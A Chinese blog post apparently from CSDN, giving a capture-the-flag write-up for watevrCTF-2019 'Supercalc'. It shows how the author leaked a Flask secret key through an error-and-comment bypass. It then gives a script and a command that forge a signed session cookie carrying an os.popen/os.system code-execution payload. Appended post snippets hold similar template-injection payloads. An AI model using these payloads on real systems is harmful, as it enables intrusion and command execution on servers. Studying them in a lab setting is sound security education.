[watevrCTF-2019]Supercalc

最新推荐文章于 2022-09-01 00:06:44 发布
最新推荐文章于 2022-09-01 00:06:44 发布
阅读量750 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/108804046
版权

在这里插入图片描述
看到这种题很容易想到是模板注入

直接测试
在这里插入图片描述
有过滤,之前刷过flasksession伪造的题目
抓包查看cookie
在这里插入图片描述
可能是JWT伪造
先去github找个脚本解一下cookie
脚本

在这里插入图片描述

可以发现这里面的cookie刚好就是我们刚刚提交的东西
题目意思够清楚了,接着就是如何伪造session了
而想要伪造必须要拿到secrect_key,而由于直接输入{{}}不可行。那就看他有没有地方可以报错
在这里插入图片描述
可以发现1/0报错了
可是由于输入{{}}不可以,学到个新思路,用注释来绕过
在这里插入图片描述
可以发现通过注释我们可以直接绕过,接着就是读取key了
在这里插入图片描述
接着利用这个脚本直接生成

from flask.sessions import SecureCookieSessionInterface

secret_key = "cded826a1e89925035cc05f0907855f7"

class FakeApp:
    secret_key = secret_key


fake_app = FakeApp()
session_interface = SecureCookieSessionInterface()
serializer = session_interface.get_signing_serializer(fake_app)
cookie = serializer.dumps(
    {"history": [{"code": '__import__("os").popen("ls ").read()'}]}
)
print(cookie)

也可以用刚刚github那个脚本
注意用python3

python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history':[{'code':'__import__(os).system(\"ls \")'}]}"```

将cookie放上去
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200925211347323.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1NvcFJvbWVv,size_16,color_FFFFFF,t_70#pic_center)
查看flag.txt即可
penson by 小乌
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CP-M-for-OS-X:z80仿真器+ CPM-80重新实现,旨在允许在OS X下使用原始CPM软件
02-04
这个项目使得用户能够在现代计算机上运行那些基于古老CP/M平台的经典软件,如Zork、Turbo Pascal、WordStar和Supercalc等。 CP/M(Control Program for Microcomputers)是由Gary Kildall在1974年开发的操作系统,...
计算器 calc pb
10-13
2. `supercalc.pbt`:这是PowerBuilder的项目团队文件,用于跟踪项目的不同版本、成员信息以及源代码管理。它可能还包含了编译和构建设置。 3. `calc.pbw`:这是PowerBuilder的工作区文件,保存了开发环境的配置,...
[watevrCTF-2019]Supercalc 1
shinygod的博客
03-02 573
知识点:flask-session伪造*,key值寻找 目录解密:加密伪造:分析解题 解密: exp python3 flask_session.py decode -c '你的session' 加密伪造: python3 flask_session_cookie_manager3.py encode -s "key" -t "{'history':[{'code':'__import__(os).system(\"ls \")'}]}"``` 或者直接用下面的直接构造 from flask.sess
BUUCTF--[watevrCTF-2019]Supercalc
qq_46263951的博客
08-12 299
打开页面后发现其功能是进行计算 使用jwt解析可以发现我们所提交的内容在session中 通过1/0进行报错,用#注释来进行绕过, 执行命令可以得到加密session时所需的key 根据上面的测试我们可以知道这里是一个Flask_SSTI,所以使用flask-session-cookie加密脚本 使用ls命令查看当前目录下的所有文件 python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f09078..
BUUCTF [watevrCTF-2019] Supercalc
Senimo
12-20 811
BUUCTF [watevrCTF-2019] Supercalc 考点: session伪造 通过session拼接语句 {{config}}获取SECRET_KEY的值 启动环境: 是一个类似计算机的功能,又一个输入框,尝试输入1+1: 得到计算结果,开始想到的是SQL注入,简单测试了几个payload,都没太有反应,继续对题目进行信息收集 在HTTP请求中,查看到Cookie信息: 可以获取到session: session=eyJoaXN0b3J5IjpbeyJjb2RlIjoiMSArI
Sidekick 2.00.zip
01-19
3. **SuperCalc(超级计算器)**:这是一个强大的计算器,支持复杂的数学运算和函数,对于开发者进行计算工作提供了极大的便利。 4. **SpellChecker(拼写检查器)**:在那个没有内置拼写检查的年代,Sidekick的...
[2019watevrCTF]Supercalc wireup
ShenZ的博客
01-19 268
[2019watevrCTF]Supercalc wireup calc!这个界面看着就像ssti <class 'os._wrap_close'>是118个 利用os._wrap_close类中的popen读取目录 ''.__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('ls').read() __import__("os").popen("cat flag.txt").read()
[watevrCTF-2019]Supercalc flask-cookie伪造&SSTI
a3320315的博客
02-12 1949
题目 buu新上的题目,晚上没啥事情就做了一下~~ 打开页面是一个计算器 可以执行一些简单的运算,我们还是老实地按步骤走,先扫下目录,没发现什么东西,然后查看header,源码等,都没有发现思路,然后我们看了一下cookie 这个凭直觉都知道是flask的cooike,然后我们放到脚本里面解一下 这不是我们先前的计算么? 那么思路就很明显了,肯定是伪造cooike,那么我们就不必须拿到key才可...
[watevrCTF 2019]Swedish RSA
MangoFengC++
06-24 347
[watevrCTF 2019]Swedish RSA
[watevrCTF-2019]Cookie Store
feng的博客
03-06 226
前言 审了一周的thinkphp了,审的有些累了,去刷一下buuctf来放松放松。 这道题本来都不想写了,因为实在太水了,但是本着做一道题就写一篇WP的原则,还是把这个水题的WP给写了吧。 WP 进入环境,看到我们只有50元,需要100元才能买flag。抓包看一下,发现cookie中的session有点像base64加密的结果,解码一下发现是这样: {"money": 50, "history": []} 说明可以伪造session,把money改成100元然后再base64加密进行伪造,我们的钱就有10
python反序列化-[watevrCTF-2019]Pickle Store
最新发布
snowlyzz的博客
09-01 868
详细讲解pickle
[watevrCTF 2019]Repyc [NPUCTF2020]BasicASM
寻梦&之璐
06-04 849
[watevrCTF 2019]Repyc 佤 = 0 侰 = ~佤 * ~佤 俴 = 侰 + 侰 def 䯂(䵦): 굴 = 佤 굿 = 佤 괠 = [佤] * 俴 ** (俴 * 俴) 궓 = [佤] * 100 괣 = [] while 䵦[굴][佤] != '듃': 굸 = 䵦[굴][佤].lower() 亀 = 䵦[굴][侰:] if 굸 == '뉃': 괠[亀[佤]] = 괠
SSTI 服务端模板注入 / 沙盒逃逸
Kaleido76的博客
02-16 518
这个部分之前一直只会生搬硬套,其实到底是什么回事都不太清楚,这次查了很多资料,把这部分内容的思路整理一下。
2020/7/27 - [watevrCTF-2019]Cookie Store - 伪造cookie
抒情诗
07-27 1066
一开始还以为这是一个很难的题目,没想到就是一个简单的COOkIe伪造。 1.伪造cookie 根据他的题目提示,这可能是一道伪造cookie的题,所以先用burpsuIte进行抓包。 买这个一块钱的先试一下,结果: 很明显看到了我们剩余的钱数是50,改成500,再把post的数据id=0改为id=2用来买我们的3号商品flag。 2.获得flag forward之后有如下内容: 很明显session是一个base64,直接解码后获得flag ...
[buuctf.reverse] 116_[watevrCTF 2019]esreveR
weixin_52640415的博客
06-13 340
动调的简单小题
[watevrCTF 2019]Crypto over the intrawebs
qq_52193383的博客
08-13 235
因为每次发送的消息都有固定头部,所以可以利用这一特征求出 key。利用z3构造多个方程求解。由于^运算的参与,不能使用Int(‘x’),需使用比特流BitVec(‘x’,bit)。由key的生成过程可知 key 最多 76bits。......
CTF逆向-[GWCTF 2019]babyvm-WP-虚机模拟流程反向编码和z3约束求解器解方程工具的使用
serfend's blog
04-13 622
CTF逆向-[GWCTF 2019]babyvm-WP-虚机模拟流程反向编码和z3约束求解器解方程工具的使用 来源:https://buuoj.cn/ 内容: 附件:https://pan.baidu.com/s/1FKkXN6JDI0QkGw-UE2crNA?pwd=grb0 提取码:grb0 答案:Y0u_hav3_r3v3rs3_1t! 总体思路 发现是虚机模拟 形成每个指令的逆向 找到加密值位置(有可能不止一个位置,该题就给了一个误导的) 找到命令执行的流程(也是不止一个) 逆向编写反向加密得到f

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值